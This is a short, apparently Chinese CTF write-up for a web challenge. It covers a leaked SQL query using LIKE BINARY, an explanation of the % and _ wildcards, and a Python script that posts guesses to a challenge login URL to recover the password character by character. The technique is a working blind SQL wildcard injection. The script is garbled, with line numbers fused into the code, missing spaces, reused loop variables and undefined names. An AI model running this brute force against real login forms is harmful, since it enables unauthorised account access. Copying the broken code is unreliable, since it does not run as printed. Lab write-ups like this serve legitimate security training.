User=agent: * Disallow: Disallow: hinthint.txt 然后访问得到 Is it particularly difficult to break MD2?! I'll tell you quietly that I saw the payoad of the author. But the numbers are not clear.have fun~~~~ xxxxx024452 hash("md2",$b) xxxxxx48399 hash("md2",hash("md2",$b))
<!--注意:正式上线请删除注释内容! --> <!-- username yu22x --> <!-- SELECT * FROM users where username like binary('$username') and password like binary('$password')-->
like注入我们可以匹配出密码的位数
在 LIKE 中,常用的通配符有两种:
**%**:表示匹配任意长度的任意字符(包括零个字符)。
**_**:表示匹配单个任意字符。
所以我们还是写个脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
import requests
url="http://1f701f35-a402-4f51-a2c9-5967cea01f50.challenge.ctf.show/login.php" j='_' for i inrange(50):
for i inrange(32): for j instr: password=target+j+(31-i)*'_' data={'username':'yu22x','password':password} r=requests.post(url=url,data=data) if'wrong username or password'notin r.text: target+=j print("\r"+target,end="") break